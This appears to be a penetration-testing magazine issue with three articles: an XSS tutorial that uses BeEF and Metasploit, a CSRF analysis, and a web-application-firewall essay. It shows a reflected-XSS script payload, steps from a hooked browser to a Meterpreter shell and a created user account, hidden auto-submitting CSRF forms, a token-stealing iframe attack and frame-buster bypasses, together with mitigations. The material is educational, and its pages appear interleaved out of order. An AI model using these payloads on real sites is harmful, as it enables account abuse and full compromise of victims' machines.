The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane, then click on Standard Modules – Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So as you can see, because of BeEF, even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server-Side PHP Code:
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text, the attacker enters a piece of JavaScript into the box, the JavaScript will execute on the user's machine rather than get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
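The vulnerable reflection can be re-stated in a couple of lines. The following toy Ruby function (not the article's PHP, and purely illustrative) mimics what search1.php does: it concatenates user input straight into the response body, so attacker-supplied markup becomes part of the page.

```ruby
# Toy re-implementation of the reflection in search1.php:
# user input is concatenated into the response with no output encoding.
def render_search_result( search )
  "The parameter passed is " + search   # no output encoding!
end

render_search_result( "<script>alert(document.domain)</script>" )
# => "The parameter passed is <script>alert(document.domain)</script>"
```

Because the `<script>` tag survives intact into the response, the browser executes it in the context of the vulnerable site, which is exactly what the BeEF hook URL exploits.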
BeEF – Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball, copy it into your web server directory
Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins in the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins in the user's browser
Figure 8. Starting Metasploit
Figure 9. The "jobs" command
Figure 10. Metasploit after clicking "Send Now"
Figure 11. Meterpreter window – screenshot 1
Figure 12. Meterpreter window – screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figure 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS one must do the following:
Figure 13. Meterpreter window – screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
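The output-encoding step in the second bullet is a one-liner in most languages. The article's server-side examples are PHP; the same idea is sketched here in Ruby using the standard library's CGI.escapeHTML, purely as an illustration.

```ruby
require 'cgi'

# Output encoding: the markup characters in attacker-controlled input are
# converted to HTML entities before being echoed back into a page.
payload = "<script>alert(document.domain)</script>"
safe    = CGI.escapeHTML( payload )
# safe == "&lt;script&gt;alert(document.domain)&lt;/script&gt;"
# Rendered by a browser, this displays as text instead of executing as code.
```

The equivalent call in the article's PHP would be htmlspecialchars(); the principle (encode at the point of output, for the context you are outputting into) is the same.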
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: it is when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
• Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking users to type the text in a CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a hidden form field and in the user's session at the same time.
Cross-Site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass POST-only protection
<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame" method="POST">
<input type="text" name="message" value="I like www.evil.com">
<input type="submit">
</form>
<script>document.Form.submit();</script>
</div>
index.php (victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (victim website)
In-Depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario: Listing 4.
index.php (evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, so the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks of this kind is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
The token is stored in a webpage form's hidden field and in a session at the same time, so the two copies can be compared after the form is submitted.
One-time tokens are usually subverted by brute-force attacks, which only pay off when the token values are predictable; the tokens must therefore be unpredictable. For example, the following PHP code generates a hard-to-guess token:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
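The same token lifecycle can be sketched in a few lines of Ruby (purely as an illustration alongside the article's PHP); the session hash here is a stand-in for a real server-side session store.

```ruby
require 'securerandom'

# One-time token sketch: the token comes from a CSPRNG, lives in the
# session AND in the form's hidden field, and the two copies must match
# when the form is submitted.
session = {}
session[:token] = SecureRandom.hex( 16 )  # 32 hex characters

submitted_token = session[:token]         # a legitimate POST echoes it back
valid = ( session[:token] == submitted_token )
# A cross-site attacker cannot read the victim's page, so a forged request
# carries no valid token and this comparison fails.
```

Note that SecureRandom draws from a cryptographically secure source, which is the property the md5(uniqid(rand(), TRUE)) construction above is approximating.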
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token: Listing 2.
Listing 2. Generating the one-time token (index.php)
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Verifying the one-time token (post.php)
<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1
Using the onbeforeunload event to block the frame-busting navigation:
<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:
<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
The best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience shaped Samvel's work ethic: he started to pay attention to each line of code, for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection and CSRF (Cross-Site Request Forgery). Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
bull Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
bull Same Origin Policy
bull FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
  <iframe src="http://good.com/index.php"></iframe>
  <form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
    <input type="text" name="message" value="I like www.bad.com" />
    <input type="hidden" name="token" value="" />
    <input type="submit" value="Post" />
  </form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38 / Page 39 – http://pentestmag.com – 01/2011 (1) November
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security, however, is often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide.

Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and our working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.

A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of ever more powerful applications that provide the internet user with the required functions as fast and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.

Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.

While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular, professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how deep their respective knowledge was.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems downstream, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.

Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now, the major types have been:
bull All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
bull Cross Site Scripting (XSS)
bull Hidden Field Tampering
bull Parameter Tampering
bull Cookie Poisoning
bull Buffer Overflow
bull Forceful Browsing
bull Unauthorized access to web servers
bull Search Engine Poisoning
bull Social Engineering
The only more recent trend: attackers have lately started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then have to raise the security of older web applications to the required standards later.

However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not just use the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.

If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.

The situation is not much better with web applications that are developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more securely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.

A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not itself have to be changed.

Secure programming and WAFs are not contradictory; they actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risk of attacks on any weak spots.

After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
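The point that stripping special characters is not a full defence can be made concrete with a small sketch (Python is used for illustration here; the filter function is invented for the example, not taken from any real WAF):

```python
def strip_quotes(value: str) -> str:
    """Naive WAF rule: remove single and double quote characters."""
    return value.replace("'", "").replace('"', "")

# A classic numeric injection needs no quotes at all,
# so it passes the quote filter completely unchanged.
payload = "1 OR 1=1"
print(strip_quotes(payload))  # 1 OR 1=1 -- the malicious predicate survives
```

A quote-based payload is indeed mangled by such a rule, but any injection expressed without quotes slips straight through, which is exactly why an unanalyzed filter rule gives a false sense of security.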
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.

In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, the WAF interrupts the data transfer or reacts in a different way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as the maximum length, valid set of characters and permitted value range.
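Such parameter-quality rules can be sketched as follows (a minimal Python illustration; the field names, limits and patterns are invented for the example, and a real WAF expresses these rules in its own policy language):

```python
import re

# Hypothetical per-parameter policy: maximum length and permitted charset.
RULES = {
    "username": {"max_len": 32, "pattern": r"^[A-Za-z0-9_]+$"},
    "age":      {"max_len": 3,  "pattern": r"^[0-9]+$"},
}

def check_request(params: dict) -> bool:
    """Block the request if it carries unexpected parameters, overlong
    values, or values outside the permitted character set."""
    if set(params) - set(RULES):       # an unknown extra parameter
        return False
    for name, value in params.items():
        rule = RULES[name]
        if len(value) > rule["max_len"]:
            return False
        if not re.match(rule["pattern"], value):
            return False
    return True

print(check_request({"username": "alice", "age": "30"}))           # True
print(check_request({"username": "a", "age": "1", "debug": "1"}))  # False
```

The second request is rejected purely because it carries a third, undeclared parameter, mirroring the two-parameter form example in the text.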
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
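One simple way an XML firewall can counter the nested elements attack mentioned above is to cap element depth while parsing. A hedged sketch (the depth limit of 20 is an arbitrary example value, not taken from any product):

```python
import xml.parsers.expat

def max_depth_ok(xml_text: str, limit: int = 20) -> bool:
    """Parse the document and reject it if elements nest deeper than limit."""
    depth, deepest = 0, 0
    def start(name, attrs):
        nonlocal depth, deepest
        depth += 1
        deepest = max(deepest, depth)
    def end(name):
        nonlocal depth
        depth -= 1
    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return deepest <= limit

print(max_depth_ok("<a><b><c/></b></a>"))                # True
print(max_depth_ok("<x>" * 50 + "</x>" * 50, limit=20))  # False
```

A production XML firewall would enforce further limits (entity expansion, attribute counts, document size) in the same spirit.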
Figure 2. An overview of how a Web Application Firewall works.
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever there are changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use by employing templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
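The combined model can be sketched in a few lines of Python (the paths, attack signatures and the "high-value" section are invented for the example; real negative profiles are far richer):

```python
# Negative profile: known attack patterns, applied everywhere.
BLACKLIST_SIGNATURES = ["<script", "union select", "../"]
# Positive (learned) profile: only for the high-value sub-section.
WHITELIST = {"/order": {"item_id", "qty"}}

def allow(path: str, params: dict) -> bool:
    # Blacklist check: reject any value containing a known signature.
    for value in params.values():
        if any(sig in value.lower() for sig in BLACKLIST_SIGNATURES):
            return False
    # Whitelist check: on protected paths, the parameter set must
    # match the learned profile exactly.
    if path in WHITELIST and set(params) != WHITELIST[path]:
        return False
    return True

print(allow("/news", {"q": "waf"}))                        # True
print(allow("/news", {"q": "<script>alert(1)</script>"}))  # False
print(allow("/order", {"item_id": "7", "qty": "2"}))       # True
print(allow("/order", {"item_id": "7", "debug": "1"}))     # False
```

The blacklist gives broad, low-maintenance coverage, while the strict whitelist is reserved for the one page where re-learning effort is clearly worth it.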
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate on the basis of an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Certain special functions are only available here: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Level 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured accordingly; penetration tests help with the correct configuration.
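The URL translation just described can be pictured with a toy mapping (the paths below are invented; a real reverse proxy would also rewrite Location headers and links in the response body):

```python
# Hypothetical rewrite table: public prefix -> hidden backend URL.
REWRITE_MAP = {
    "/shop/": "/cgi-bin/legacy-store.pl?page=",
    "/news/": "/internal/cms/render.php?article=",
}

def to_backend(public_path: str) -> str:
    """Map a public URL to the hidden backend URL it cloaks."""
    for prefix, backend in REWRITE_MAP.items():
        if public_path.startswith(prefix):
            return backend + public_path[len(prefix):]
    return public_path

print(to_backend("/shop/1234"))  # /cgi-bin/legacy-store.pl?page=1234
```

The visitor only ever sees the clean public path, so the technology stack behind it (here a fictitious legacy Perl script) stays hidden from reconnaissance scans.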
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
bull Does the system have a Web Application Firewall?
bull Does the web traffic occur via a WAF proxy function?
bull Are the web servers shielded against direct access by attackers?
bull Is there simple SSL encryption for the data traffic, even if the application or the server does not support this?
bull Are all known and unknown threats blocked?
A further point is the protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
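Such an outgoing-traffic check can be sketched with the standard PAN-detection technique of a digit-run regex plus a Luhn checksum (this is a generic illustration, not the mechanism of any particular product):

```python
import re

def luhn_ok(digits: str) -> bool:
    """Luhn checksum, which valid card numbers satisfy."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:       # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def leaks_pan(body: str) -> bool:
    """Flag a response body that appears to contain a PAN."""
    for match in re.findall(r"\b\d{13,16}\b", body):
        if luhn_ok(match):
            return True
    return False

print(leaks_pan("Order confirmed, card 4111111111111111"))  # True
print(leaks_pan("Tracking number 1234567890123"))           # False
```

The Luhn check keeps arbitrary digit runs (order numbers, tracking codes) from triggering the filter, while the well-known test card number above is caught.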
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.

Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context, the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or the use of the web application. All other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or better still a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar configuration processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
